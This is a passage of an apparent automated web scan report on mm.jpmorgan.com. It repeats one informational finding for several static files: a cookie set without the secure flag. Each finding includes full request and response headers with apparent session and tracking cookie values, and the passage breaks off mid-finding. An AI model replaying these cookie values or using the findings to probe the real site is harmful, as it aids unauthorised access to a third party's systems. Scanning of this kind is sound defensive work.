User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:30:26 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"4761-1310119390000"
Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT
Cache-Control: max-age=3600
Expires: Tue, 12 Jul 2011 17:30:26 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 4761
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/png

.PNG
.
...IHDR...(............M....gAMA......a.....PLTE...:%.=)."""..K..j.$w-+k@+!A-"D0%F2(H5+J6,L9/N<2Q>4R@6UB9WE<YH>III[I@]LC_NFbRIfUMfffjjjmmmsss $.%+.$*.(1..7./>.;C.3C.:M.<Q.DY.Rc.wt.~.Mh.Qo
...[SNIP]...

7.64. https://mm.jpmorgan.com/css/yui/tabview.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/css/yui/tabview.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/yui/tabview.css HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:55 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"6532-1310119390000"
Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:55 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 6532
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
.yui-navset .yui-nav li,.yui-navset .yu
...[SNIP]...

7.65. https://mm.jpmorgan.com/css/yui/treeview.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/css/yui/treeview.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/yui/treeview.css HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:53 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"5077-1310119390000"
Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:53 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 5077
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
table.ygtvtable{margin-bottom:0;border:
...[SNIP]...

7.66. https://mm.jpmorgan.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 302 Found
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:30:00 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Location: https://iblogin.jpmorgan.com/sso/action/federateLogin?URI=https%3a%2f%2fmm.jpmorgan.com%3a443%2ffavicon.ico&msg=+&securityLevel=0&cs=V05Mtro7P%2f8lpwB5gAv4hsgbAKM%3d
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:35:00 GMT
Vary: Accept-Encoding
Content-Length: 361
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://iblogin.jpmorgan.com/sso/action/federat
...[SNIP]...

7.67. https://mm.jpmorgan.com/images/JPM_logo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/images/JPM_logo.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/JPM_logo.gif HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:57 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"1863-1310119380000"
Last-Modified: Fri, 08 Jul 2011 10:03:00 GMT
Cache-Control: max-age=432000
Expires: Sun, 17 Jul 2011 16:29:57 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 1863
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89aa......='.@+ Q<2_J@........y...P;1}j`............J5+F1'...;%.?).T?5[G=...r^T...@+!O:1...p\R...cOE.wnZE;C.$...B-"I4*q^T...=(.R=3WB9........VA7<&.dPFU@6.qh......<'.jVL..{S>5nZPye[{h_.yq;%.......B
...[SNIP]...

7.68. https://mm.jpmorgan.com/images/Morgan_Markets_logo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/images/Morgan_Markets_logo.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/Morgan_Markets_logo.gif HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:57 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"2594-1310119380000"
Last-Modified: Fri, 08 Jul 2011 10:03:00 GMT
Cache-Control: max-age=432000
Expires: Sun, 17 Jul 2011 16:29:57 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 2594
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..........rsvwx{qrupqtops.........xy|..................nor..........................................z{~...stwuvx........................vwz...|}...............................................
...[SNIP]...

7.69. https://mm.jpmorgan.com/images/backgrounds/btn_hover_center_bg.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/images/backgrounds/btn_hover_center_bg.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/backgrounds/btn_hover_center_bg.png HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:30:26 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"177-1310119380000"
Last-Modified: Fri, 08 Jul 2011 10:03:00 GMT
Cache-Control: max-age=3600
Expires: Tue, 12 Jul 2011 17:30:26 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 177
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/png

.PNG
.
...IHDR..............}2.....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<.../IDAT.Wc..-....D.;...n.e......2w.+...N.J0.........%#e......IEND.B`.

7.70. https://mm.jpmorgan.com/images/btn_center_bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/images/btn_center_bg.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/btn_center_bg.gif HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:57 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"138-1310119378000"
Last-Modified: Fri, 08 Jul 2011 10:02:58 GMT
Cache-Control: max-age=432000
Expires: Sun, 17 Jul 2011 16:29:57 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 138
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.......................................................................................................,........... d...<H.D. (...;

7.71. https://mm.jpmorgan.com/images/btn_hover_center_bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/images/btn_hover_center_bg.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/btn_hover_center_bg.gif HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:30:25 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"87-1310119380000"
Last-Modified: Fri, 08 Jul 2011 10:03:00 GMT
Cache-Control: max-age=432000
Expires: Sun, 17 Jul 2011 16:30:25 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 87
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.........?..[..N..G.....G..a.....f..U.f................,...........P.dB.....*J..;

7.72. https://mm.jpmorgan.com/images/btn_hover_left_side.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/images/btn_hover_left_side.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/btn_hover_left_side.gif HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:30:25 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"170-1310119378000"
Last-Modified: Fri, 08 Jul 2011 10:02:58 GMT
Cache-Control: max-age=432000
Expires: Sun, 17 Jul 2011 16:30:25 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 170
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.........q..[..J..?.....L..v..b..W..N.....{.....p........}..G.. ..U..X..j..+.q......G.f................!.......,..........'.vi..i
.9.F..2iF.5.VZ.h..P.....ERB.4!.;

7.73. https://mm.jpmorgan.com/images/btn_hover_right_side.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/images/btn_hover_right_side.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/btn_hover_right_side.gif HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:30:26 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"170-1310119378000"
Last-Modified: Fri, 08 Jul 2011 10:02:58 GMT
Cache-Control: max-age=432000
Expires: Sun, 17 Jul 2011 16:30:26 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 170
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.........q..[..J..?.....L..v..b..W..N.....{.....p........}..G.. ..U..X..j..+.q......G.f................!.......,..........'.vm.u..v8Z@h..%..5.PiL.a._.(,>.. E.0.6!.;

7.74. https://mm.jpmorgan.com/images/btn_left_side.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/images/btn_left_side.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/btn_left_side.gif HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
